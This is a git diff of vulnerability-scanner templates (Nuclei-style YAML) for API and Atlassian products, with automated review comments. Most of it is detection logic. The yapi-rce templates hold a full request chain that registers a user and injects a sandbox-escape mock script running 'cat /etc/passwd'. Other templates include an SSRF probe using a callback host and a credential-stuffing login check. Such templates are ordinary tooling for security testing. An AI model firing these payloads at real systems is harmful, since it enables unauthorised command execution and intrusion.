"{{BaseURL}}/api/v2/application.wadl" - stop-at-first-match: true matchers: - name: http-get @@ -26,13 +23,11 @@ requests: - "This is simplified WADL with user and core resources only" - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" - - method: OPTIONS path: - "{{BaseURL}}" - "{{BaseURL}}/api/v1" - "{{BaseURL}}/api/v2" - stop-at-first-match: true matchers: - name: http-options 
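Review bot: Removing `stop-at-first-match: true` from both request blocks of poc/api/wadl-api-11084.yaml means every listed path is requested even after one has matched, so a single host can yield several findings for the same exposure. Unless per-path results are wanted, keep `stop-at-first-match: true` on the GET and the OPTIONS block. The new word `"\"http://jersey.java.net/\""` now requires the surrounding quotes and the trailing slash to appear in the body; the other two words still match under `condition: or`, but a short comment saying why the stricter form is used would help the next maintainer.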
diff --git a/poc/api/wsdl-api-11632.yaml b/poc/api/wsdl-api-11632.yaml index 71703837f3..4bad6b6027 100644 --- a/poc/api/wsdl-api-11632.yaml +++ b/poc/api/wsdl-api-11632.yaml @@ -1,15 +1,27 @@ id: wsdl-api + info: - name: wsdl-detect + name: WSDL API - Detect author: jarijaas severity: info - description: Detects web services that have WSDL (https://www.w3.org/TR/wsdl/) + description: WSDL API was detected. + reference: https://www.w3.org/TR/wsdl/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 tags: exposure,api -requests: + +http: - method: GET path: - "{{BaseURL}}/?wsdl" + matchers: - type: word words: - "wsdl:definitions" + +# digest: 490a0046304402201eccb43d9aa98c6691258d0eb19fada4fa2f6f621bd15c11b2a909441194cc5502207038b072b9a896169b97f955541ab6a6c3d2ca0b551bbe148514ac0e0591a3f6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/wsdl-api-11634.yaml b/poc/api/wsdl-api-11634.yaml new file mode 100644 index 0000000000..71703837f3 --- /dev/null +++ b/poc/api/wsdl-api-11634.yaml @@ -0,0 +1,15 @@ +id: wsdl-api +info: + name: wsdl-detect + author: jarijaas + severity: info + description: Detects web services that have WSDL (https://www.w3.org/TR/wsdl/) + tags: exposure,api +requests: + - method: GET + path: + - "{{BaseURL}}/?wsdl" + matchers: + - type: word + words: + - "wsdl:definitions" diff --git a/poc/api/wso2-apimanager-detect-11638.yaml b/poc/api/wso2-apimanager-detect-11638.yaml deleted file mode 100644 index 042ae34b83..0000000000 --- a/poc/api/wso2-apimanager-detect-11638.yaml +++ /dev/null 
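Review bot: The only matcher in poc/api/wsdl-api-11632.yaml is the word `wsdl:definitions`, so a WSDL document whose root element uses the default namespace (`<definitions xmlns="http://schemas.xmlsoap.org/wsdl/">`) is missed. Adding the namespace URI as a second word, `- "http://schemas.xmlsoap.org/wsdl/"`, with `condition: or` would cover both forms. The new file poc/api/wsdl-api-11634.yaml added later on this line carries the same matcher and the same `id: wsdl-api`, so results from the two files cannot be told apart by id.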
@@ -1,19 +0,0 @@ -id: wso2-apimanager-detect -info: - name: WSO2 API Manager detect - author: righettod - severity: info - description: Try to detect the presence of a WSO2 API Manager instance via the version endpoint - tags: tech,wso2,api-manager -requests: - - method: GET - path: - - "{{BaseURL}}/services/Version" - matchers-condition: and - matchers: - - type: word - words: - - "version.services.core.carbon.wso2.org" - - type: status - status: - - 200 diff --git a/poc/api/yapi-rce-11724.yaml b/poc/api/yapi-rce-11724.yaml index 0afebedde5..e9f9d9d864 100644 --- a/poc/api/yapi-rce-11724.yaml +++ b/poc/api/yapi-rce-11724.yaml @@ -1,19 +1,17 @@ id: yapi-rce + info: - name: Yapi - Remote Code Execution + name: Yapi Remote Code Execution author: pikpikcu severity: critical - description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. + tags: yapi,rce + description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. reference: - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://twitter.com/sec715/status/1415484190561161216 - https://github.com/YMFE/yapi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: yapi,rce + requests: - raw: - | # REQUEST 1 
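Review bot: `tags: yapi,rce` in poc/api/yapi-rce-11724.yaml does not mark this template as state-changing, although the raw requests that follow this hunk register a user and create a project and an interface on the target, and nothing visible removes them afterwards. Adding the `intrusive` tag, `tags: yapi,rce,intrusive`, lets operators keep it out of routine scans of production systems. The hunk also deletes the `classification` block, so the CVSS vector and CWE no longer reach the report. poc/api/yapi-rce-11725.yaml, added further down, has the same tags line. The `requests:` block continues outside this hunk.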
@@ -21,35 +19,42 @@ requests: Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 - {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"} + {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} + - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} Content-Type: application/json, text/plain, */* + - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} + - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} + - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} + - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} + - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} + cookie-reuse: true extractors: - type: regex @@ -59,6 +64,7 @@ requests: part: body regex: - '"_id":([0-9]+),"group_name"' + - type: regex name: interface_id group: 1 @@ -66,6 +72,7 @@ requests: part: body regex: - '"req_body_form":\[\],"_id":([0-9]+)' + - type: regex name: project_id group: 1 
@@ -73,14 +80,14 @@ requests: part: body regex: - '"tag":\[\],"_id":([0-9]+)' + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body + - type: status status: - 200 - -# Enhanced by mp on 2022/06/03 diff --git a/poc/api/yapi-rce-11725.yaml b/poc/api/yapi-rce-11725.yaml new file mode 100644 index 0000000000..0afebedde5 --- /dev/null +++ b/poc/api/yapi-rce-11725.yaml 
@@ -0,0 +1,86 @@ +id: yapi-rce +info: + name: Yapi - Remote Code Execution + author: pikpikcu + severity: critical + description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. + reference: + - https://www.secpulse.com/archives/162502.html + - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b + - https://twitter.com/sec715/status/1415484190561161216 + - https://github.com/YMFE/yapi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: yapi,rce +requests: + - raw: + - | # REQUEST 1 + POST /api/user/reg HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"} + - | # REQUEST 2 + GET /api/group/list HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json, text/plain, */* + - | # REQUEST 3 + POST /api/project/add HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} + - | # REQUEST 4 + GET /api/project/get?id={{project_id}} HTTP/1.1 + Host: {{Hostname}} + - | # REQUEST 5 + POST /api/interface/add HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} + - | # REQUEST 6 + POST /api/plugin/advmock/save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat 
/etc/passwd\").toString()","enable":true} + - | # REQUEST 7 + GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + extractors: + - type: regex + name: group_id + group: 1 + internal: true + part: body + regex: + - '"_id":([0-9]+),"group_name"' + - type: regex + name: interface_id + group: 1 + internal: true + part: body + regex: + - '"req_body_form":\[\],"_id":([0-9]+)' + - type: regex + name: project_id + group: 1 + internal: true + part: body + regex: + - '"tag":\[\],"_id":([0-9]+)' + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/03 diff --git a/poc/atlassian/atlassian-bamboo-panel.yaml b/poc/atlassian/atlassian-bamboo-panel.yaml new file mode 100644 index 0000000000..3faf916ca1 --- /dev/null +++ b/poc/atlassian/atlassian-bamboo-panel.yaml @@ -0,0 +1,44 @@ +id: atlassian-bamboo-panel + +info: + name: Atlassian Bamboo Login Panel - Detect + author: righettod + severity: info + description: | + Atlassian Bamboo login panel was detected. + reference: + - https://www.atlassian.com/software/bamboo + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Bamboo" + tags: panel,bamboo,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/userlogin!doDefault.action?os_destination=%2Fstart.action" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Log in as a Bamboo user' + - 'content="Bamboo' + - 'atlassian.bamboo.plugins' + - 'Atlassian Bamboo</a>' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'version\s+([0-9A-Za-z\s\.]+)\s+-' + - 'pvpVersion = "([a-z0-9.]+)";' +# digest: 4b0a00483046022100ece84998eb9793b9e2c73bac643c4cf195724becb28ccb35d37fad0066c4967b022100b75da45856fa8d90182181299882a1339a8ba78ccc81f4964c4754a16e3acf6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/atlassian/atlassian-crowd-panel-583.yaml b/poc/atlassian/atlassian-crowd-panel-583.yaml deleted file mode 100644 index 3532e9a84c..0000000000 --- a/poc/atlassian/atlassian-crowd-panel-583.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: atlassian-crowd-panel - -info: - name: Atlassian Crowd Login Panel - author: organiccrap - severity: info - description: An Atlassian Crowd login panel was discovered. - reference: - - https://www.atlassian.com/ - classification: - cwe-id: CWE-200 - tags: panel,atlassian - -requests: - - method: GET - path: - - '{{BaseURL}}/crowd/console/login.action' - - matchers: - - type: word - words: - - <title>Atlassian Crowd - Login - part: body - -# Enhanced by mp on 2022/03/20 diff --git a/poc/atlassian/bitbucket-takeover-738.yaml b/poc/atlassian/bitbucket-takeover-738.yaml new file mode 100644 index 0000000000..2987941c14 --- /dev/null +++ b/poc/atlassian/bitbucket-takeover-738.yaml @@ -0,0 +1,21 @@ +id: bitbucket-takeover +info: + name: Bitbucket Takeover Detection + author: pdteam + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - "Repository not found" + part: body + - type: word + words: + - "text/plain" + part: header diff --git a/poc/atlassian/bitbucket-takeover-739.yaml b/poc/atlassian/bitbucket-takeover-739.yaml index 2987941c14..9d027b93b1 100644 --- a/poc/atlassian/bitbucket-takeover-739.yaml +++ b/poc/atlassian/bitbucket-takeover-739.yaml 
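Review bot: The matcher set in the new poc/atlassian/bitbucket-takeover-738.yaml has no guard for targets given as an IP address, so any host that answers `Repository not found` as `text/plain` is reported as a high-severity takeover even where no DNS name is involved. The revision of poc/atlassian/bitbucket-takeover.yaml that this same commit removes carried such a guard; adding it back as a third matcher (`- type: dsl`, then `dsl:` with the single entry `- Host != ip`) keeps the finding to hostnames. The hunks for bitbucket-takeover-739.yaml and bitbucket-takeover.yaml below have the same gap.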
@@ -1,21 +1,26 @@ id: bitbucket-takeover + info: name: Bitbucket Takeover Detection author: pdteam severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - "Repository not found" part: body + - type: word words: - "text/plain" - part: header + part: header \ No newline at end of file diff --git a/poc/atlassian/bitbucket-takeover-740.yaml b/poc/atlassian/bitbucket-takeover-740.yaml deleted file mode 100644 index b0aabdf6b4..0000000000 --- a/poc/atlassian/bitbucket-takeover-740.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: bitbucket-takeover -info: - name: Bitbucket Takeover Detection - author: pdcommunity - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - "Repository not found" - part: body - - type: word - words: - - "text/plain" - part: header diff --git a/poc/atlassian/bitbucket-takeover.yaml b/poc/atlassian/bitbucket-takeover.yaml index e93be7cca6..b0aabdf6b4 100644 --- a/poc/atlassian/bitbucket-takeover.yaml +++ b/poc/atlassian/bitbucket-takeover.yaml 
@@ -1,34 +1,21 @@ id: bitbucket-takeover - info: name: Bitbucket Takeover Detection - author: pdteam + author: pdcommunity severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - metadata: - max-request: 1 tags: takeover - -http: + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - - type: dsl - dsl: - - Host != ip - - type: word words: - "Repository not found" part: body - - type: word words: - "text/plain" part: header - -# digest: 490a0046304402205b7987c056997dd8161cbd726a93029f3a2d206d66578330bd5fba78acdbb0b302201841488659a4fbf01a69e02d721787a50df41e386528a826981c64d5c2154306:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/confluence-detect-1186.yaml b/poc/atlassian/confluence-detect-1186.yaml index ba239b67f4..0e63d59c09 100644 --- a/poc/atlassian/confluence-detect-1186.yaml +++ b/poc/atlassian/confluence-detect-1186.yaml @@ -5,9 +5,10 @@ info: author: philippedelteil severity: info description: Allows you to detect Atlassian Confluence instances - tags: tech,confluence,atlassian metadata: - shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22 + shodan-query: http.component:"Atlassian Confluence" + tags: tech,confluence,atlassian + requests: - method: GET @@ -19,19 +20,18 @@ requests: redirects: true stop-at-first-match: true - matchers-condition: and + matchers-condition: or matchers: - type: word + part: header words: - - '-Confluence-' - '-confluence-' - part: header - condition: or + case-insensitive: true - type: word + part: body words: - 'confluence-base-url' - part: body extractors: - type: regex diff --git a/poc/atlassian/confluence-detect-1187.yaml b/poc/atlassian/confluence-detect-1187.yaml deleted file mode 100644 index 0e17bc5ab9..0000000000 --- a/poc/atlassian/confluence-detect-1187.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: confluence-detect - -info: - name: Confluence Detect - author: philippedelteil - severity: info - description: Allows you to detect Atlassian Confluence instances - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: tech,confluence,atlassian - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/pages" - - "{{BaseURL}}/confluence" - - "{{BaseURL}}/wiki" - - redirects: true - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: header - words: - - '-confluence-' - case-insensitive: true - - - type: word - part: body - words: - - 'confluence-base-url' - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'Atlassian Confluence ([a-z0-9-._]+)' diff --git a/poc/atlassian/confluence-detect-1189.yaml b/poc/atlassian/confluence-detect-1189.yaml new file mode 100644 index 0000000000..ba239b67f4 --- /dev/null +++ b/poc/atlassian/confluence-detect-1189.yaml @@ -0,0 +1,41 @@ +id: confluence-detect + +info: + name: Confluence Detect + author: philippedelteil + severity: info + description: Allows you to detect Atlassian Confluence instances + tags: tech,confluence,atlassian + metadata: + shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22 + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/pages" + - "{{BaseURL}}/confluence" + - "{{BaseURL}}/wiki" + + redirects: true + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - '-Confluence-' + - '-confluence-' + part: header + condition: or + + - type: word + words: + - 'confluence-base-url' + part: body + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Atlassian Confluence ([a-z0-9-._]+)' diff --git a/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml b/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml index ed2faf3539..ce7c19d866 100644 --- a/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml 
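Review bot: `shodan-query` in the new poc/atlassian/confluence-detect-1189.yaml holds a full search URL and not a query string; the confluence-detect-1186.yaml hunk earlier in this commit corrects exactly that. Use `shodan-query: http.component:"Atlassian Confluence"` here too. The header matcher also lists `-Confluence-` and `-confluence-` as separate words where 1186 now uses one word with `case-insensitive: true`, which would be the more consistent form.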
+++ b/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml @@ -1,44 +1,19 @@ id: confluence-ssrf-sharelinks - info: - name: Atlassian Confluence < 5.8.6 Server-Side Request Forgery + name: Confluence SSRF in sharelinks author: TechbrunchFR severity: medium - description: Atlassian Confluence < 5.8.6 is affected by a blind server-side request forgery vulnerability in the widgetconnector plugin. + description: Vulnerable should be Confluence versions released from 2016 November and older reference: - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks - https://github.com/assetnote/blind-ssrf-chains#confluence - - https://nvd.nist.gov/vuln/detail/CVE-2021-26072 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 6.8 - cwe-id: CWE-918 - remediation: Upgrade to Atlassian Confluence version 5.8.6 or later. - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: confluence,atlassian,ssrf,oast - + tags: confluence,atlassian,ssrf,jira,oast requests: - method: GET path: - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/' - - matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - - type: word - part: body - words: - - "faviconURL" - - "domain" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/14 diff --git a/poc/atlassian/confluence-ssrf-sharelinks-1192.yaml b/poc/atlassian/confluence-ssrf-sharelinks-1192.yaml new file mode 100644 index 0000000000..ed2faf3539 --- /dev/null +++ b/poc/atlassian/confluence-ssrf-sharelinks-1192.yaml 
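Review bot: With `matchers-condition: and` and the body and status matchers removed from poc/atlassian/confluence-ssrf-sharelinks-1191.yaml, the only evidence left is an HTTP interaction on the OAST host, which any intermediary that fetches URLs seen in a query string (a proxy, WAF or link scanner) can produce. The removed matchers tied the callback to a 200 response from the sharelinks endpoint containing `faviconURL` and `domain`; keeping them, as in the fence below, lowers false positives for a medium-severity finding. The hunk also drops the `remediation` and `classification` fields, so the report no longer tells the reader which version fixes the issue.

```yaml
    matchers-condition: and
    matchers:
      # … unchanged: interactsh_protocol word matcher …
      - type: word
        part: body
        words:
          - "faviconURL"
          - "domain"
        condition: and

      - type: status
        status:
          - 200
```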
@@ -0,0 +1,44 @@ +id: confluence-ssrf-sharelinks + +info: + name: Atlassian Confluence < 5.8.6 Server-Side Request Forgery + author: TechbrunchFR + severity: medium + description: Atlassian Confluence < 5.8.6 is affected by a blind server-side request forgery vulnerability in the widgetconnector plugin. + reference: + - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks + - https://github.com/assetnote/blind-ssrf-chains#confluence + - https://nvd.nist.gov/vuln/detail/CVE-2021-26072 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 6.8 + cwe-id: CWE-918 + remediation: Upgrade to Atlassian Confluence version 5.8.6 or later. + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: confluence,atlassian,ssrf,oast + +requests: + - method: GET + path: + - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/' + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: body + words: + - "faviconURL" + - "domain" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/14 diff --git a/poc/atlassian/confluence-ssrf-sharelinks-1193.yaml b/poc/atlassian/confluence-ssrf-sharelinks-1193.yaml deleted file mode 100644 index 7e693c969d..0000000000 --- a/poc/atlassian/confluence-ssrf-sharelinks-1193.yaml +++ /dev/null 
@@ -1,36 +0,0 @@ -id: confluence-ssrf-sharelinks - -info: - name: Confluence SSRF in sharelinks - author: TechbrunchFR - severity: medium - description: Vulnerable should be Confluence versions released from 2016 November and older - reference: - - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks - - https://github.com/assetnote/blind-ssrf-chains#confluence - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: confluence,atlassian,ssrf,oast - -requests: - - method: GET - path: - - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/' - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: word - part: body - words: - - "faviconURL" - - "domain" - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/poc/atlassian/jira-detect-8313.yaml b/poc/atlassian/jira-detect-8313.yaml new file mode 100644 index 0000000000..f1891fc518 --- /dev/null +++ b/poc/atlassian/jira-detect-8313.yaml @@ -0,0 +1,25 @@ +id: jira-detect +info: + name: Detect Jira Issue Management Software + author: pdteam,philippedelteil + severity: info + tags: panel,jira +requests: + - method: GET + path: + - "{{BaseURL}}/secure/Dashboard.jspa" + - "{{BaseURL}}/jira/secure/Dashboard.jspa" + - "{{BaseURL}}/login.jsp" + stop-at-first-match: true + redirects: true + max-redirects: 2 + matchers: + - type: word + words: + - "Project Management Software" + extractors: + - type: regex + part: body + group: 1 + regex: + - 'title="JiraVersion" value="([0-9.]+)' diff --git a/poc/atlassian/jira-detect-8314.yaml b/poc/atlassian/jira-detect-8314.yaml deleted file mode 100644 index 4f24793ad5..0000000000 --- a/poc/atlassian/jira-detect-8314.yaml +++ /dev/null 
@@ -1,29 +0,0 @@ -id: jira-detect - -info: - name: Detect Jira Issue Management Software - author: pdteam,philippedelteil - severity: info - tags: panel,jira - -requests: - - method: GET - path: - - "{{BaseURL}}/secure/Dashboard.jspa" - - "{{BaseURL}}/jira/secure/Dashboard.jspa" - - "{{BaseURL}}/login.jsp" - - stop-at-first-match: true - redirects: true - max-redirects: 2 - matchers: - - type: word - words: - - "Project Management Software" - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'title="JiraVersion" value="([0-9.]+)' diff --git a/poc/atlassian/jira-detect-8316.yaml b/poc/atlassian/jira-detect-8316.yaml index f1891fc518..4f24793ad5 100644 --- a/poc/atlassian/jira-detect-8316.yaml +++ b/poc/atlassian/jira-detect-8316.yaml @@ -1,15 +1,18 @@ id: jira-detect + info: name: Detect Jira Issue Management Software author: pdteam,philippedelteil severity: info tags: panel,jira + requests: - method: GET path: - "{{BaseURL}}/secure/Dashboard.jspa" - "{{BaseURL}}/jira/secure/Dashboard.jspa" - "{{BaseURL}}/login.jsp" + stop-at-first-match: true redirects: true max-redirects: 2 @@ -17,6 +20,7 @@ requests: - type: word words: - "Project Management Software" + extractors: - type: regex part: body diff --git a/poc/atlassian/jira-login-default.yaml b/poc/atlassian/jira-login-default.yaml index 4b34037e6d..d3d14b37e6 100644 --- a/poc/atlassian/jira-login-default.yaml +++ b/poc/atlassian/jira-login-default.yaml @@ -8,10 +8,10 @@ info: reference: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: + max-request: 1 shodan-query: http.component:"Atlassian Jira" fofa-query: product="JIRA" tags: login-check,jira,creds-stuffing,self-hosted - variables: username: "{{username}}" password: "{{password}}" @@ -32,8 +32,8 @@ http: dsl: - username - password - attack: pitchfork + matchers-condition: and matchers: - type: word 
@@ -43,4 +43,6 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 4a0a0047304502201b101496c1854e349bf95753e7cdfb3343d8599dc26efb543e4c3ceb2bb95e1f0221008648d8f4932d84b324ff6a350ea792a0ef1ef91a393292f43082173ccbb99a54:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-dashboards-8323.yaml b/poc/atlassian/jira-unauthenticated-dashboards-8323.yaml index 8628c41074..f31db155cc 100644 --- a/poc/atlassian/jira-unauthenticated-dashboards-8323.yaml +++ b/poc/atlassian/jira-unauthenticated-dashboards-8323.yaml @@ -1,21 +1,15 @@ id: jira-unauthenticated-dashboards - # If public sharing is ON it allows users to share dashboards and filters with all users including -# those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. +# those that are not logged in. Those dashboard and filters could reveal potentially sensitive information. info: name: Jira Unauthenticated Dashboards author: TechbrunchFR severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira - -http: +requests: - method: GET path: - "{{BaseURL}}/rest/api/2/dashboard?maxResults=100" - matchers: - type: word words: @@ -31,4 +25,3 @@ http: # If you change this setting, you will still need to update the existing filters and dashboards if they have already been # shared publicly. # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. -# digest: 4a0a0047304502210082b7cb53987cdc653c9a8954733b3456da26355e585b238aa94d81e7938d77f302204de8001df94c11cc650f5ae455212a63c404a066cc29b911fd45686c3bde1a9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-dashboards-8327.yaml b/poc/atlassian/jira-unauthenticated-dashboards-8327.yaml index 54b3c68a6d..8628c41074 100644 --- a/poc/atlassian/jira-unauthenticated-dashboards-8327.yaml +++ b/poc/atlassian/jira-unauthenticated-dashboards-8327.yaml 
@@ -1,16 +1,21 @@ id: jira-unauthenticated-dashboards -# If public sharing is ON it allows users to share dashboards and filters with all users including +# If public sharing is ON it allows users to share dashboards and filters with all users including # those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. info: name: Jira Unauthenticated Dashboards author: TechbrunchFR severity: info + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira -requests: + +http: - method: GET path: - "{{BaseURL}}/rest/api/2/dashboard?maxResults=100" + matchers: - type: word words: @@ -20,15 +25,10 @@ requests: condition: and # Remediation: - # Ensure that this permission is restricted to specific groups that require it. - # You can restrict it in Administration > System > Global Permissions. - # Turning the feature off will not affect existing filters and dashboards. - # If you change this setting, you will still need to update the existing filters and dashboards if they have already been - # shared publicly. - # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. +# digest: 4a0a0047304502210082b7cb53987cdc653c9a8954733b3456da26355e585b238aa94d81e7938d77f302204de8001df94c11cc650f5ae455212a63c404a066cc29b911fd45686c3bde1a9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml b/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml index da56b71092..bb38dd61ea 100644 --- a/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml +++ b/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml 
@@ -1,17 +1,14 @@ id: jira-unauthenticated-installed-gadgets - info: name: Jira Unauthenticated Installed gadgets author: philippedelteil severity: info description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets) tags: atlassian,jira - requests: - method: GET path: - "{{BaseURL}}/rest/config/1.0/directory" - redirects: true max-redirects: 2 matchers-condition: and @@ -19,7 +16,6 @@ requests: - type: word words: - 'jaxbDirectoryContents' - - type: status status: - 200 diff --git a/poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml b/poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml new file mode 100644 index 0000000000..58e5fb36b6 --- /dev/null +++ b/poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml @@ -0,0 +1,31 @@ +id: jira-unauthenticated-installed-gadgets + +info: + name: Jira Unauthenticated Installed gadgets + author: philippedelteil + severity: info + description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets) + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" + tags: atlassian,jira + +http: + - method: GET + path: + - "{{BaseURL}}/rest/config/1.0/directory" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'jaxbDirectoryContents' + + - type: status + status: + - 200 + +# digest: 